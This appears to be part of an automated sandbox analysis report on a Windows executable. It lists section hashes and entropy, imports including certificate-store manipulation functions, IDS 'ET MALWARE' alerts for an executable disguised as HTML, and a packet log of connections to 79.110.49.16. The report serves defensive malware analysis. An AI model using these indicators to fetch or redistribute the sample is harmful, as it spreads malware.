                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0xb0000x5d580x5e00ec94ce6ebdbe57640638e0aa31d08896False0.4178025265957447Applesoft BASIC program data, first line number 14.843224204192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States
                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-10-02T06:25:23.034206+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649723TCP
                                                                                                                                                2024-10-02T06:25:24.139539+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649725TCP
                                                                                                                                                2024-10-02T06:25:27.919859+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649730TCP
                                                                                                                                                2024-10-02T06:25:29.012255+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649731TCP
                                                                                                                                                2024-10-02T06:25:30.764881+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649734TCP
                                                                                                                                                2024-10-02T06:25:31.855577+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649736TCP
                                                                                                                                                2024-10-02T06:25:34.080744+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649737TCP
                                                                                                                                                2024-10-02T06:25:35.668872+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.16443192.168.2.649738TCP
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 2, 2024 06:25:15.772679090 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:15.772744894 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:15.775185108 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:15.797631979 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:15.797668934 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.441049099 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.441135883 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.444935083 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.444958925 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.445327044 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.486808062 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.514651060 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.555419922 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743093967 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743110895 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743119001 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743154049 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743161917 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743170023 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743283033 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.743340015 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.743362904 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.743390083 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.831309080 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.831330061 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.831437111 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.831466913 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.831531048 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.833142042 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.833157063 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.833225965 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.833235025 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.833281994 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.918946981 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.918973923 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.919035912 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.919080973 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.919091940 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.919137001 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.920011044 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.920036077 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.920090914 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.920098066 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.920130014 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.920151949 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.921763897 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.921780109 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.921848059 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.921855927 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.921900034 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.993352890 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.993371964 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.993438005 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.993488073 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.993526936 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.993535042 CEST4434971479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:16.993540049 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.993580103 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:16.998397112 CEST49714443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:17.365253925 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:17.365314960 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:17.365400076 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:17.365634918 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:17.365648985 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.004385948 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.007138968 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:18.007170916 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268007040 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268039942 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268069029 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268249989 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:18.268280029 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268333912 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:18.268630981 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268685102 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:18.268691063 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268721104 CEST4434971679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:18.268757105 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:18.268791914 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:18.270268917 CEST49716443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:21.937494993 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:21.937541008 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:21.937619925 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:21.937825918 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:21.937844992 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.557404041 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.563612938 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:22.563641071 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.819068909 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.819094896 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.819112062 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.819178104 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:22.819219112 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.819273949 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:22.928276062 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.928299904 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.928371906 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:22.928412914 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.928458929 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:22.929815054 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.929831982 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.929897070 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:22.929908037 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:22.929944992 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.034234047 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.034259081 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.034316063 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.034339905 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.034368992 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.034384966 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.035486937 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.035505056 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.035557032 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.035567999 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.035598040 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.035614967 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.036406994 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.036441088 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.036475897 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.036483049 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.036499023 CEST4434972379.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.036511898 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.036525965 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.036555052 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.045595884 CEST49723443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.058806896 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.058840036 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.058926105 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.059175014 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.059186935 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.697459936 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.707726002 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.707746029 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.960025072 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.960068941 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.960091114 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.960185051 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.960185051 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:23.960202932 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:23.960274935 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.049664974 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.049688101 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.049792051 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.049810886 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.049820900 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.049860001 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.051553965 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.051570892 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.051618099 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.051624060 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.051641941 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.051676035 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.139549017 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.139590025 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.139689922 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.139704943 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.139715910 CEST4434972579.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.139750957 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.139750957 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.171928883 CEST49725443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.183712006 CEST49727443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.183770895 CEST4434972779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.183902025 CEST49727443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.184135914 CEST49727443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.184154034 CEST4434972779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.803118944 CEST4434972779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:24.812325954 CEST49727443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:24.812350988 CEST4434972779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.070449114 CEST4434972779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.070523977 CEST4434972779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.070581913 CEST49727443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.071445942 CEST49727443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.075078011 CEST49728443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.075176954 CEST4434972879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.075278044 CEST49728443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.075467110 CEST49728443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.075503111 CEST4434972879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.703974962 CEST4434972879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.705303907 CEST49728443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.705347061 CEST4434972879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.962291002 CEST4434972879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.962385893 CEST4434972879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.962450027 CEST49728443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.963361025 CEST49728443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.967133999 CEST49729443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.967174053 CEST4434972979.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:25.967243910 CEST49729443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.967467070 CEST49729443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:25.967482090 CEST4434972979.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:26.588371038 CEST4434972979.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:26.639482021 CEST49729443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:26.639498949 CEST4434972979.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:26.848058939 CEST4434972979.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:26.848145008 CEST4434972979.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:26.848197937 CEST49729443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:26.849351883 CEST49729443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:26.853125095 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:26.853157043 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:26.853230953 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:26.853554964 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:26.853566885 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.481890917 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.483306885 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.483321905 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.743927956 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.743988991 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.744046926 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.744208097 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.744208097 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.744223118 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.744288921 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.832113028 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.832165003 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.832204103 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.832211018 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.832278967 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.833899021 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.833960056 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.833980083 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.833986998 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.834014893 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.834036112 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.919857025 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.919873953 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.919967890 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.919974089 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.920017004 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.921219110 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.921237946 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.921291113 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.921295881 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.921308041 CEST4434973079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.921334982 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.921358109 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.922867060 CEST49730443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.945739985 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.945862055 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:27.945951939 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.946221113 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:27.946259022 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.573424101 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.574812889 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:28.574862957 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.836678028 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.836704016 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.836723089 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.836801052 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:28.836853981 CEST4434973179.110.49.16192.168.2.6
